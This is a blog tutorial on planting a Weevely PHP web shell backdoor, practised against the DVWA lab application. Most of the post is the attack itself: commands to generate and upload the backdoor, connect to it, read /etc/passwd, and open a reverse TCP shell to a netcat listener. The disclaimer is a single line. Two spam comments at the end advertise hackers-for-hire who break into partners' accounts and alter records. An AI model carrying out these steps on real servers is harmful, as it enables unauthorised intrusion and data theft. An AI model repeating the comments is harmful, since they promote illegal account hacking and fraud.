Labels

Creating Web Backdoor using Backtrack (Weevely tutorial)




Weevely PHP stealth web shell and backdoor is a PHP web shell that provides a telnet-like console to execute system commands and automatize administration and post-exploitation tasks. It is an essential tool for web application post exploitation, and also can be used as stealth backdoor.

Weevely is by defaultly available in OS like Backtrack, Backbox etc.

Weevely php stealth web shell and backdoor has more than 30 modules available for post exploitation tasks.

weevely is written in python.

Lets Start our Practical

Requirement:

1.Webserver for uploading the backdoor ( i installed dvwa on linux box)

2.Weevely PHP Shell(i.e, available in backtrack 5R3)
Steps

Steps to start

1.weevely is available in /pentest/backdoors/web/weevely/

Open terminal and type cd /pentest/backdoors/web/weevely/

2.Generate PHP stealth backdoor

./weevely.py generate security
When we execute this command a new file will be created called weevely.php

3.After generatig file the next step will be upload weevely.php file to webserver and we are uploading it to webserver.

I am using DVWA(Damn Vulnerable Web Application) for testing purpose.

4.Now file has been successfully uploaded

5.Now access that weevely .php from terminal

./weevely.py 

./weevely.py http://192.168.142.135/dvwa/hackable/uploads/weevely.php security

Now we are in server

6.If we want to see files in that directory type ls
 7.if we want to see passwords cat /etc/passwd

8.if we want to see who we are

whoami



9.using weevely for backdoor

here i am opening one more terminal and i am starting netcat

nc -lvp 1234

and in weevely terminal

:backdoor.reverse_tcp 192.168.142.132 1234



now we are connected

now you can access all server files.

NOTE: Only study purpose only.. dont try this...

thank you.

Labels:

Comments

  1. jane holly21 May 2020 at 16:03


    My life was falling apart, I was being cheated and abused, I had to know the truth and needed proof. I contacted a private investigator that linked me with onlineghost who took care of the hack job. He hacked his iPhone,Facebook,Instagram, Whats app, twitter and email account. I got all I wanted as proof . I”m glad i had a proven truth he was cheating . Contact him for any hack job. Tell him i referred you to him, he will surely meet your hack need. Contact: onlineghosthacker247@ gmail .com

    ReplyDelete
  2. felisha green24 May 2020 at 10:35

    Do you need to increase your credit score?
    Do you intend to upgrade your school grade?
    Do you want to hack your cheating spouse Email, whatsapp, Facebook, instagram or any social network?
    Do you need any information concerning any database.
    Do you need to retrieve deleted files?
    Do you need to clear your criminal records or DMV?
    Do you want to remove any site or link from any blog?
    you should contact this hacker, he is reliable and good at the hack jobs..
    contact : cybergoldenhacker at gmail dot com

    ReplyDelete

Post a Comment

Popular Posts